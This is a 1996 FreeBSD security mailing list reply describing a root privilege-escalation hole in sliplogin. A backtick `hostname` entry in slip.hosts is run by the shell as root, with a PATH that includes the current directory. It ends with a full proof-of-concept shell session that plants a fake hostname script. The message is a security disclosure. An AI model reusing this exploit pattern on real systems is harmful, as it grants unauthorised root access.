From owner-freebsd-security  Mon Feb 12 02:36:28 1996
Return-Path: owner-security
Received: (from root@localhost)
          by freefall.freebsd.org (8.7.3/8.7.3) id CAA13474
          for security-outgoing; Mon, 12 Feb 1996 02:36:28 -0800 (PST)
Received: from maelstrom.Berkeley.EDU (maelstrom-ether.Berkeley.EDU [128.32.184.248])
          by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id CAA13469
          for <freebsd-security@freebsd.org>; Mon, 12 Feb 1996 02:36:26 -0800 (PST)
Received: (from mconst@localhost) by maelstrom.Berkeley.EDU (8.6.12/8.6.12) id CAA23693; Mon, 12 Feb 1996 02:36:18 -0800
Date: Mon, 12 Feb 1996 02:36:18 -0800
From: Michael Constant <mconst@ocf.Berkeley.EDU>
Message-Id: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
To: mconst@csua.berkeley.edu, nate@sri.MT.net
Subject: Re: sliplogin hole?
Cc: freebsd-security@freebsd.org
Sender: owner-security@freebsd.org
Precedence: bulk

> > The sliplogin(8) manpage recommends using lines of the following form
> > in /etc/sliphome/slip.hosts:
> > 
> > Sfoo	`hostname`	foo	netmask
> > 
> > The problem with this is that the `hostname` portion is passed directly
> > to the shell, without any processing -- as root.  This means J. Random
> > Slip-User can create a script called ~/bin/hostname that does whatever
> > he wants, and (as long as ~/bin is before /bin in his path) his script
> > will be run as root the next time he types "sliplogin foo".
>
> Except that the path supplied to sliplogin is the standard unix
> path (PATH=:/bin:/usr/bin), which doesn't use anything from the user's
> home directory (unless it was explicitly set in the shell script.

Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which
is just as insecure as not changing the path at all :-)  But thanks for
pointing out my misconception.

The exploit as I stated it does work; it's written out in full below,
in case I didn't explain it clearly in my original letter.

> Also, if you are concerned about security, you don't allow your
> slip-login users to create/modify any of their slip files, which is easy
> to do as long as you don't give them the same uid's for both shell login
> and slip login accounts and use paranoid permissions on both accounts.

This will work, as long as the shell user is not allowed to run
sliplogin.  Otherwise, the exploit stands:

jrl@host% cd ~/bin
jrl@host% cat > hostname
#! /bin/sh
touch /etc/i-am-root
/bin/hostname
^D
jrl@host% chmod 755 hostname
jrl@host% sliplogin Sjrl
starting slip login for Sjrl

... and by this point, the deed is done.

		- Michael Constant